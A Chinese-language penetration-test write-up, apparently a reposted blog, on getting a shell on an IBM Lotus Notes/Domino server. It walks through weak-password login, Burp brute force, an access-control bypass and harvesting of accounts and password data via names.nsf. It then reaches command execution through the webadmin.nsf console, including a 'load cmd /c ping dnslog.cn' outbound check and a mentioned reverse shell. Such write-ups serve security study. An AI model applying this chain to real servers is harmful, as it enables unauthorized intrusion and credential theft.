Getshell之旅 IBM-Lotus Notes

  • A+
所属分类:安全文章


对某站点进行渗透测试

 

查看js发现是IBM-Lotus Notes

 

Getshell之旅 IBM-Lotus Notes



 

Getshell之旅 IBM-Lotus Notes



 

马上搜索该框架的漏洞

 

Getshell之旅 IBM-Lotus Notes



 

查看是否存在越权漏洞/names.nsf/$users

 

Getshell之旅 IBM-Lotus Notes

 

返回登陆界面、失败。

 

随手输入admin/123456弱口令进去了、啊这

 

Getshell之旅 IBM-Lotus Notes

 

???管理员好像登陆不了

 

使用爆破大法,通过burp爆破拿到了一个员工账户。

进去html代码都出来了,估计没人是个废弃的系统-0-

 

Getshell之旅 IBM-Lotus Notes

 

 

因为之前测试过这框架,老版本确实存在很多越权关系。尝试删除url参数

 

Getshell之旅 IBM-Lotus Notes

 

发现越权了、好像是管理界面、楞是没找到上传点而且数据太多卡的一批

 

再尝试/names.nsf/、获得了邮箱服务器地址+用户+电子邮箱

 


 

Getshell之旅 IBM-Lotus Notes


 

访问names.nsf/$users 所以用户获取账户+密码

 

Getshell之旅 IBM-Lotus Notes

 

Getshell之旅 IBM-Lotus Notes


看了下用户时间- -都是14-16年的果然是个遗忘的废弃系统、但是这种资产就是我们最好的入手点。


 

Getshell之旅 IBM-Lotus Notes


找了下IBM-Lotus Notes getshell的方法:

可通过webadmin.nsf访问控制台进行接口管理。Lotus Domino控制台提供了各种命令用于管理服务器。只要获取管理员权限后,就可以执行各种命令,造成命令执行。

 

普通用户无法越权到控制台

Getshell之旅 IBM-Lotus Notes

 

我们使用刚刚的管理员用户登陆webadmin.nsf

 

Getshell之旅 IBM-Lotus Notes

 

选择"Server"-"Status"-"Quickconsole",执行命令

 

Getshell之旅 IBM-Lotus Notes

 

使用命令看看目标能不能出网先

load cmd /c ping dnslog.cn


利用反弹shell getshell

 


Getshell之旅 IBM-Lotus Notes



本文始发于微信公众号(Khan安全团队):Getshell之旅 IBM-Lotus Notes

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: